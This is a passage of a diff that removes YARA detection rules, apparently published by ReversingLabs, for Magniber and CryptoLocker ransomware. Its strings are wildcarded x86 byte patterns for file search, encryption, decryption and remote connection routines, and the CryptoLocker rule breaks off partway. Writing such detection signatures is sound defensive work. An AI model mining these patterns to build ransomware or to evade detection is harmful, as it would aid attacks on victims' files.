-		logic_hash = "05b516f9b466489ea3a30e2fe5eb08290e85ece7a63e29e8bbbeb81c87d0a6f1"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Magniber"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$remote_connection = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55
-            ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 6A ??
-            8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 6A
-            ?? 8D 45 ?? 50 8D 4D ?? 51 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
-            ?? 8B 55 ?? 83 C2 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D
-            ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 EB ??
-            C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ??
-            ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
-        }
-		$encrypt_files_1 = {
-            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ??
-            ?? ?? ?? 89 45 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 55 ?? 03 55 ?? 8D 44 12
-            ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? EB
-            ?? 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 7D ?? 8B 45 ?? 8B 4D ?? 8B 55 ?? 8B
-            75 ?? 66 8B 14 56 66 89 14 41 EB ?? B8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 66 89 04 4A C7
-            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 7D ?? 8B 55 ??
-            03 55 ?? 8B 45 ?? 8B 4D ?? 8B 75 ?? 66 8B 0C 4E 66 89 4C 50 ?? EB ?? 8B 55 ?? 03 55
-            ?? 33 C0 8B 4D ?? 66 89 44 51 ?? 8D 55 ?? 52 8D 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 8B
-        }
-		$encrypt_files_2 = {
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83
-            7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84
-            ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 4D ?? 51 6A ??
-            8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 99 8B 4D ??
-            2B 4D ?? 8B 75 ?? 1B 75 ?? 89 45 ?? 89 55 ?? 89 4D ?? 89 75 ?? 8B 55 ?? 3B 55 ?? 7C
-            ?? 7F ?? 8B 45 ?? 3B 45 ?? 76 ?? 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55
-            ?? EB ?? 8B 45 ?? 99 89 45 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B
-        }
-		$encrypt_files_3 = {
-            45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 83 7D ??
-            ?? 75 ?? E9 ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 73 ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 89 55
-            ?? 8B 45 ?? 50 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 52 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51
-            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? EB ??
-            E9 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ??
-            74 ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ??
-            83 7D ?? ?? 74 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? 7F ?? 8B 4D ?? 3B 4D ??
-            76 ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ??
-            8B 4D ?? 51 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
-            83 C4 ?? B8 ?? ?? ?? ?? EB
-        }
-		$search_files = {
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 7D ?? 8B 4D ?? 8B 94
-            8D ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 33 C0 E9 ?? ?? ??
-            ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 81 ?? ?? ?? ?? 3B 82 ?? ?? ?? ?? 76 ?? B8 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? B8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ??
-            83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? EB ?? 8B 55 ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83 C1
-            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 74 ?? 8B 4D ?? 81 79 ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ??
-            81 79 ?? ?? ?? ?? ?? 75 ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ??
-            ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 03 45 ?? 89
-            45 ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 6A ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55 ??
-            81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B 55
-            ?? 81 C2 ?? ?? ?? ?? 52 8B 45 ?? 05 ?? ?? ?? ?? 50 8B 4D ?? 81 C1 ?? ?? ?? ?? 51 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8
-        }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files and ( all of ( $encrypt_files_* ) ) and $remote_connection )
-}
-
-rule REVERSINGLABS_Win32_Ransomware_Cryptolocker : TC_DETECTION MALICIOUS MALWARE FILE
-{
-	meta:
-		description = "Yara rule that detects CryptoLocker ransomware."
-		author = "ReversingLabs"
-		id = "8cc3ac4b-9179-5e2c-97e1-65304f9dfe22"
-		date = "2020-06-26"
-		modified = "2020-07-15"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoLocker.yara#L3-L154"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08430b0c5689840d592bdda5dbc2ed06e0d0fa1e2c0f19aff4316580c6a0b23d"
-		score = 75
-		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoLocker"
-		tc_detection_factor = 5
-		importance = 25
-
-	strings:
-		$file_loop_1 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 45 01
-            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 75 ??
-            6A ?? 8B 49 ?? 6A ?? 52 56 8B 01 6A ?? 89 55 ?? 8B 00 FF D0 84 C0 0F 84 E6 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 33 D2 89
-            45 ?? 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
-            0F 8B 45 ?? 8D 0C 13 8B 40 ?? 88 0C 02 42 EB CC 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 6B 85 DB 77 0E 72 08 81 FF ?? ?? ??
-            ?? 73 04 8B F7 EB 05 BE ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ?? ?? ?? ?? 85 C0 74 ??
-            39 75 ?? 75 ?? 8B 45 ?? 2B FE 8B 55 ?? 83 DB ?? 2B D7 8B 48 ?? 8B 45 ?? 1B C3 50 8B 31 52 FF 75 ?? FF 75 ?? 8B 06 6A ??
-            FF D0 84 C0 74 34 85 DB 77 AD 72 04 85 FF 75 95 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D ?? FE C1 0F B6 C1 88 4D ?? 3B 45
-            ?? 0F 82 C6 FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$file_loop_2 = {
-            55 8B EC 83 EC ?? 53 56 8B D9 57 89 5D ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 32 C9 83 7D ?? ?? 88 4D ?? 0F 86 50 01
-            00 00 8B 5D ?? 0F 57 C0 66 0F 13 45 ?? 84 C9 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 49 ??
-            8B 75 ?? 8B 01 6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 F1 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ??
-            33 D2 8B D8 85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73
-            10 8B 45 ?? 8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ??
-            ?? ?? 73 07 8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF
-            30 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 75 ?? 75 ?? 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50
-            8B 06 52 FF 75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 34 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 4D
-            ?? FE C1 0F B6 C1 88 4D ?? 3B 45 ?? 0F 82 BB FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$file_loop_3 = {
-            55 8B EC 83 EC ?? 53 56 8B C1 57 89 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 62 01 00 00 8B 5D ?? 32 C0 0F 57 C0 88 45 ?? 66 0F
-            13 45 ?? EB 03 8D 49 ?? 84 C0 74 08 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? FF 75 ?? FF 33 FF 15 ?? ?? ?? ?? 85 C0
-            0F 84 27 01 00 00 8D 45 ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 0F 84 13 01 00 00 8B 4D ?? 8B 55 ?? 8B 49 ?? 8B 75 ?? 8B 01
-            6A ?? 8B 00 6A ?? 52 56 6A ?? 89 55 ?? FF D0 84 C0 0F 84 EE 00 00 00 FF 15 ?? ?? ?? ?? 8B 7D ?? 89 45 ?? 33 D2 8B D8 90
-            85 FF 72 18 77 08 81 FE ?? ?? ?? ?? 76 0E B8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB 05 8B C6 89 7D ?? 3B D0 73 10 8B 45 ??
-            8D 0C 13 8B 40 ?? 42 88 4C 02 ?? EB CB 8B 5D ?? 85 FF 8B FE 75 04 85 F6 74 75 85 DB 77 11 72 08 81 FF ?? ?? ?? ?? 73 07
-            8B F7 89 5D ?? EB 0C BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 56 FF 70 ?? 8B 45 ?? FF 30 FF 15 ??
-            ?? ?? ?? 85 C0 74 5E 39 75 ?? 75 59 8B 45 ?? 8B 55 ?? 8B 48 ?? 8B 45 ?? 2B FE 8B 31 83 DB ?? 2B D7 1B C3 50 8B 06 52 FF
-            75 ?? FF 75 ?? 6A ?? FF D0 84 C0 74 30 85 DB 77 A6 72 04 85 FF 75 8B 8B 5D ?? FF 33 FF 15 ?? ?? ?? ?? 8A 45 ?? FE C0 88
-            45 ?? 3C ?? 0F 82 BE FE FF FF B0 ?? 5F 5E 5B 8B E5 5D C2
-        }
-		$encrypt_data_1 = {
-            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 58 48 83 F8 ?? 77 48 8B 5D ??
-            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ??
-            FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B
-            47 ?? 33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42
-            ?? 33 D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
-        }
-		$encrypt_data_2 = {
-            55 8B EC 56 8B 75 ?? 57 8B F9 39 75 ?? 73 09 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 07 53 85 C0 74 56 48 83 F8 ?? 77 46 8B 5D ??
-            8B 45 ?? 3B D8 74 0B 56 50 53 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75
-            ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5B 0F 44 CA 5F 8B C1 5E 5D C2 ?? ?? 5B 5F 83 C8 ?? 5E 5D C2 ?? ?? 8B 47 ??
-            33 D2 89 45 ?? 8B 47 ?? 85 F6 74 26 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5B 5F 8B C6 5E 5D C2
-        }
-		$encrypt_data_3 = {
-            55 8B EC 53 56 8B 75 ?? 8B D9 39 75 ?? 72 4C 83 3B ?? 77 47 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B 56 50 57 E8 ?? ?? ?? ?? 83
-            C4 ?? FF 75 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA ?? 85 C0 5F
-            0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 5E 83 C8 ?? 5B 5D C2
-        }
-		$decrypt_data_1 = {
-            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 53 48 83 F8 ?? 77 55 8B 75 ?? 39 75 ?? 72 4D 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 89 75 ?? 50 8B 45 ?? 53 6A ?? 0F B6 C0 50 6A ?? FF 77 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
-            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2
-            89 45 ?? 8B 47 ?? 85 F6 74 28 8B 7D ?? 8B DE 8B 4D ?? 8B F0 2B F9 8B FF 8A 04 0F 8D 49 ?? 32 04 32 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
-        }
-		$decrypt_data_2 = {
-            55 8B EC 53 56 57 8B F9 8B 07 85 C0 74 51 48 83 F8 ?? 77 53 8B 75 ?? 39 75 ?? 72 4B 8B 5D ?? 8B 45 ?? 3B D8 74 0B 56 50
-            53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 53 6A ?? 50 6A ?? FF 77 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 83 CA
-            ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 8B 75 ?? 39 75 ?? 73 0A 5F 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 47 ?? 33 D2 89 45
-            ?? 8B 47 ?? 85 F6 74 2A 8B 4D ?? 8B 7D ?? 8B DE 2B F9 8B F0 8D 64 24 ?? 8A 04 0F 32 04 32 8D 49 ?? 88 41 ?? 8D 42 ?? 33
-            D2 F7 75 ?? 4B 75 E9 8B 75 ?? 5F 8B C6 5E 5B 5D C2
-        }
-		$decrypt_data_3 = {
-            55 8B EC 53 8B D9 83 3B ?? 77 56 56 8B 75 ?? 39 75 ?? 73 09 5E 83 C8 ?? 5B 5D C2 ?? ?? 8B 45 ?? 57 8B 7D ?? 3B F8 74 0B
-            56 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 0F B6 45 ?? 57 6A ?? 50 6A ?? FF 73 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ??
-            83 CA ?? 85 C0 5F 0F 44 CA 5E 8B C1 5B 5D C2 ?? ?? 83 C8 ?? 5B 5D C2
-        }
-		$decrypt_strings_1 = {
-            55 8B EC 53 56 8B D9 8B F2 57 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
-            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 D1 E9 5F 5E 5B 8D 41 ?? 5D C3
-        }
-		$decrypt_strings_2 = {
-            55 8B EC 53 56 8B D9 57 8B F2 33 C9 33 FF 2B DE 8B 45 ?? 8D 14 31 8A 04 07 02 C1 32 04 13 88 02 8D 47 ?? 33 D2 F7 75 ??
-            8B FA F6 C1 ?? 75 0B 8B C1 D1 E8 66 83 3C 46 ?? 74 03 41 EB D3 5F D1 E9 5E 8D 41 ?? 5B 5D C3
-        }
-		$decrypt_1 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C B7 00 00 00 33 D2 8B 0C 95 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0C
-            95 ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 89 0C 95 ?? ?? ?? ?? 42 81 FA ?? ?? ?? ??
-            7C C0 81 FA ?? ?? ?? ?? 7D 39 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 81 E1 ?? ?? ?? ?? 33 0E 8B C1 D1 E9 83 E0 ?? 8B 04
-            85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 06 83 C6 ?? 81 FE ?? ?? ?? ?? 7C D0 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81
-            E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 D1 E9 83 E0 ?? 33 0C 85 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B
-            0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0
-            ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$decrypt_2 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
-            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
-            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
-            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
-            7C CE 5E 8B 0D ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 81 E1 ?? ?? ?? ?? 33 0D ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ??
-            ?? 33 0D ?? ?? ?? ?? 33 C0 89 0D ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 40 A3 ?? ?? ?? ?? 8B C1 C1 E8 ?? 33 C8 8B C1 25 ?? ??
-            ?? ?? C1 E0 ?? 33 C8 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 C3
-        }
-		$decrypt_3 = {
-            A1 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8C C7 00 00 00 33 D2 EB 0C 8D A4 24 ?? ?? ?? ?? EB 03 8D 49 ?? 8B 0C 95 ?? ?? ?? ?? 33
-            0C 95 ?? ?? ?? ?? 42 81 E1 ?? ?? ?? ?? 33 0C 95 ?? ?? ?? ?? 8B C1 83 E0 ?? D1 E9 33 0C 85 ?? ?? ?? ?? 33 0C 95 ?? ?? ??
-            ?? 89 0C 95 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 7C C0 81 FA ?? ?? ?? ?? 7D 3B 56 8D 34 95 ?? ?? ?? ?? 8B 0E 33 4E ?? 83 C6 ??
-            81 E1 ?? ?? ?? ?? 33 4E ?? 8B C1 83 E0 ?? D1 E9 8B 04 85 ?? ?? ?? ?? 33 86 ?? ?? ?? ?? 33 C1 89 46 ?? 81 FE ?? ?? ?? ??
